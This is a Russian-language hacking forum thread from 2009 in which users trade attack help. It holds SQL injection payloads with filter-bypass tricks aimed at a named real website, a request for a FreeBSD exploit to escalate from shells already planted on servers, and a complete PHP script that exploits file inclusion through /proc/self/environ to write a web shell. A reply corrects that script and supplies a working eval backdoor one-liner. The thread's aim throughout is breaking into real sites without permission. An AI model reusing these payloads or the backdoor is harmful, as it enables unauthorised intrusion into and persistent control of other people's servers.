Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.12.2009, 13:05
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от ILYAtirtir
Если в лимите и после order by то никак.
Можно, если FILE_PRIV = Y (В этой же теме вопрос уже всплывал).
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
15.12.2009, 15:38
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
Часто попадаеться шелл с фряхой 6.3. и на всех биндиться порт. Токо эксплоита не могу найти под неё. Можеть ктонить знает?
|
|
|
|
15.12.2009, 21:56
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
Не могу никак прорулить скуль.
В которой фильтрующийся слова select ,union, or, and, order, group
Warning: pg_query() [function.pg-query]: Query failed: ERROR: ошибка синтаксиса в или рядом "UNION" LINE 3: WHERE c.id = 57+UNION ^ in /opt/newrss/htdocs/sabre/libs/Db_pgsql.php on line 37
Warning: pg_query() [function.pg-query]: Query failed: ERROR: колонка "UNIONN" не существует LINE 3: WHERE c.id = 57+UNIONN ^ in /opt/newrss/htdocs/sabre/libs/Db_pgsql.php on line 37
узнал что стоит PostgreSQL 8.2.9 on i386-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070925 (Red Hat 4.1.2-27)
Прочитал http://forum.antichat.ru/thread35599.html результату не дало!(
Есть выход?)
|
|
|
|
15.12.2009, 22:01
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
"+" замени на пробел и все заработает)
|
|
|
|
16.12.2009, 00:06
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
http://dev.rssportal.ru/catalog/57'+order+by+1/*
|
|
|
|
16.12.2009, 00:19
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
PHP код:
<?php
$host = "www.ыаывпывпыпывпп";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$shell = file_get_contents("shell.php");
$sock = fsockopen($host,$port);
if(!$sock)
echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),$shell) ?>'."\r\n";
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen($shell)."\r\n";
$head .= "\r\n$shell\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>
почему не работает? на сайте создаётся пустой файл (без кода) |
|
|
|
16.12.2009, 00:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от Micr0b
http://dev.rssportal.ru/catalog/57'+order+by+1/*
dev.rssportal.ru/catalog/1111111111111111'1'union(select(null)from(select(1 ))a)
как то так
/add
или так
http://dev.rssportal.ru/catalog/1111111111111111'1'and(1)=version()::int
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 16.12.2009 в 00:35..
|
|
|
|
16.12.2009, 01:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Matnya
PHP код:
<?php
$host = "www.ыаывпывпыпывпп";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$shell = file_get_contents("shell.php");
$sock = fsockopen($host,$port);
if(!$sock)
echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),$shell) ?>'."\r\n";
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen($shell)."\r\n";
$head .= "\r\n$shell\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>
почему не работает? на сайте создаётся пустой файл (без кода) потому что php-скрипт, прописанный в user-agent, выполняется на стороне сервера (в чем и есть суть уязвимости), а ты пытаешься взять содержимое шелла со своего компьютера, а скрипт, записанный в user-agent, ищет файл на сервере, есс-но не находит и просто создает пустой файл. Вывод - все, что ты хочешь записать в файл - пиши прямо в php-код в user-agent, например <?if (isset($_REQUEST[data_time])) eval(stripslashes($_REQUEST[data_time]));?>
PS: Представляешь, чтобы было, если бы работало так, как ты хочешь? Я написал php-скрипт на сервере и читаю любой файл на ТВОЕМ компе? )))
Последний раз редактировалось Pashkela; 16.12.2009 в 01:07..
|
|
|
|
16.12.2009, 01:03
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
слышал про http method:seccomp но везде говорят одинаково и нету подробного обьяснения
|
|
|
|
16.12.2009, 01:17
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
Сообщение от Pashkela
потому что php-скрипт, прописанный в user-agent, выполняется на стороне сервера (в чем и есть суть уязвимости), а ты пытаешься взять содержимое шелла со своего компьютера, а скрипт, записанный в user-agent, ищет файл на сервере, есс-но не находит и просто создает пустой файл. Вывод - все, что ты хочешь записать в файл - пиши прямо в php-код в user-agent, например <?if (isset($_REQUEST[data_time])) eval(stripslashes($_REQUEST[data_time]));?>
PS: Представляешь, чтобы было, если бы работало так, как ты хочешь? Я написал php-скрипт на сервере и читаю любой файл на ТВОЕМ компе? )))
спс. щас буду фиксить. я просто думал что интерпритатор, сам вместо той переменной подставит код, который в ней. а он это ХЗ почему не сделал.
UDP: Аааааааааааа всё допёр.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
